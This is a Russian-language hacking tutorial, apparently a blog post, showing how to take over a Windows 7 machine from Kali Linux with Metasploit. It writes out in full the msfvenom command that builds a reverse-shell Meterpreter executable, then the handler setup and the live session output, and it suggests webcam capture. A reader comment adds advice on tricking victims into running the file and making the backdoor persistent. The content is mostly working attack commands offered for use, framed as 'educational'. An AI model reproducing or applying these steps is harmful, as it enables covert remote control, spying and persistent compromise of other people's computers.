Kali Linux является производным от Debian Linux и он в основном используется для проникновения. Он имеет более чем 300 предустановленных программ тестирования проникновения. Он поддерживается платформой Metasploit Framework в проекте Metasploit, инструмент для разработки и выполнения эксплойтов. Давайте начнем с хака Windows с помощью Кали Linux. Стоит отметить, что мы пишем этот пост только в целях образования.
Детали исходной машины:
Kali Linux
root@kali:/# uname -a Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux root@kali:/#
Целевая машина, используемая для взлома:
Windows 7 Ultimate SP1
Шаг 1 . Создание нагрузки
Payload представляет собой программу, которая похожа как вирус или троян, которая выполняется на удаленной машине для цели взлома. Для создания полезной нагрузки используется команды написанные ниже, которые будут взламывать windows с Kali Linux.
root@kali:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128 LPORT=4444 --format=exe -o /root/program.exe No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 333 bytes Final size of exe file: 73802 bytes Saved as: /root/program.exe root@kali:/# ls -la /root/program.exe -rw-r--r-- 1 root root 73802 Jan 26 00:46 /root/program.exe
С помощью команды ls мы подтвердили, что наша программа Payload успешно создана в указанном месте.
Шаг 2: Запустите команду mfsconsole, которая запустит запрос msf.
root@kali:# msfconsole .,,. . .\$$$$$L..,,==aaccaacc%#s$b. d8, d8P d8P #$$$$$$$$$$$$$$$$$$$$$$$$$$$b. `BP d888888p d888888P '7$$$$\""""''^^`` .7$$$|D*"'``` ?88' d8bd8b.d8p d8888b ?88' d888b8b _.os#$|8*"` d8P ?8b 88P 88P`?P'?P d8b_,dP 88P d8P' ?88 .oaS###S*"` d8P d8888b $whi?88b 88b d88 d8 ?8 88b 88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88' ?88 ?88 88b d88 d88 .a#$$$$$$"` 88b d8P 88b`?8888P' ,s$$$$$$$"` 888888P' 88n _.,,,ass;: .a$$$$$$$P` d88P' .,.ass%#S$$$$$$$$$$$$$$' .a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$' ,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS' .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$' _______________________________________________________________ ,&$$$$$$'_____ ll&&$$$$' .;;lll&&&&' ...;;lllll&' ......;;;llll;;;.... ` ......;;;;... . . Taking notes in notepad? Have Metasploit Pro track & report your progress and findings -- learn more on http://rapid7.com/metasploit =[ metasploit v4.12.22-dev ] + -- --=[ 1577 exploits - 906 auxiliary - 272 post ] + -- --=[ 455 payloads - 39 encoders - 8 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf >
Шаг 3: Для использования мы использовали следующие детали:
Теперь дайте следующую команду в строке msf “use exploit/multi/handler”
msf > use exploit/multi/handler msf exploit(handler) >
Затем дайте команду “set payload windows/meterpreter/reverse_tcp” в следующей строке:
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp
Теперь установите локальный IP и порт, используя команду lhost и lport, как показано ниже:
msf exploit(handler) > set lhost 192.168.189.128 lhost => 192.168.189.128 msf exploit(handler) > set lport 4444 lport => 4444
и, наконец, используйте команду.
msf exploit(handler) > exploit [*] Started reverse TCP handler on 192.168.189.128:4444 [*] Starting the payload handler...
Теперь вам нужно выполнить команду “program.exe” на машине с Windows, как только она выполнится на целевой машине, вы можете в состоянии установить сессию meterpreter. Просто наберите SysInfo, чтобы получить детали взломанной машины с Windows.
msf exploit(handler) > exploit [*] Started reverse TCP handler on 192.168.189.128:4444 [*] Starting the payload handler... [*] Sending stage (957999 bytes) to 192.168.189.1 [*] Meterpreter session 1 opened (192.168.189.128:4444 -> 192.168.189.1:53091) at 2017-01-26 00:51:31 +0000 meterpreter > sysinfo Computer : MANN-PC OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x64 (Current Process is WOW64) System Language : en_IN Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/win32
После того как вы успешно получите детали, вы можете сделать больше в использовании или получить более подробную информацию с помощью команды “help“, которая покажет все варианты, с помощью которых вы можете взломать систему, например, вы можете выполнить команду веб-камера оснастки “webcam_snap” так же, как вы можете использовать многие доступные опции. Счастливого хакерства !!!!
как ты собрался взламывать самого себя? ты не указал ip жретвы ты указал только свой IP а адрес журтвы нет
nrx смотри ты должен применить социальную инженерию что бы жертва скачала файл а что по поводу запуска бек дора все пипец как просто пишешь код на java на автозапуск команды и закрытия докступа у закрытию командной строки еще можно добавить бек док закинув в авто загрузку и на жоский диск и поставив его на какой нибудь службу все что душе угодно вот и ответ все просто!